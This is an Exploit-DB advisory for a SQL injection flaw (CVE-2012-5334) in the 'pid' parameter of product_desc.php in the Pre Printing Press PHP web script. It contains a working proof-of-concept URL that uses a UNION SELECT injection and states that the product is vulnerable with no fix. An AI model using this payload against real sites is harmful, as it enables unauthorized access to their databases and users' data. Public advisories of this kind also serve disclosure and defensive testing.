Pre Printing Press product_desc.php pid SQL Injection Vulnerability

2012-03-18T00:00:00
ID EDB-ID:18616
Type exploitdb
Reporter Easy Laster
Modified 2012-03-18T00:00:00

Description

Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability. CVE-2012-5334. Webapps exploit for php platform

                                        
                                            ========================================================================================
| # Title    : Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability
| # Author   : Easy Laster
| # Script   : Pre Printing Press
| # Price    : $999
| # Exploitation : remote
| # Bug      : SQL Injection
| # Date     : 18.03.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
======================        Proof of Concept         =================================


  [+] Introduction
  
   A complete printing press website script contains all features required for online printing
   business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy 
   to navigate. Package contains builtin designers to customize designs online, shopping cart 
   and complete users and orders modules.Product is user friedly and can fully operate via 
   secure admin panel.Script is fully customizable and ready to upload to start your printing 
   press now.

  [+] Vulnerability

    http://[host]/[path]/prestudio/product_desc.php?pid=[vul]
  
  [+] Injectable

    http://[host]/[path]/prestudio/product_desc.php?pid=1
    +union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1--+&cid=&sid=

  [+] Fix
  
    No fix.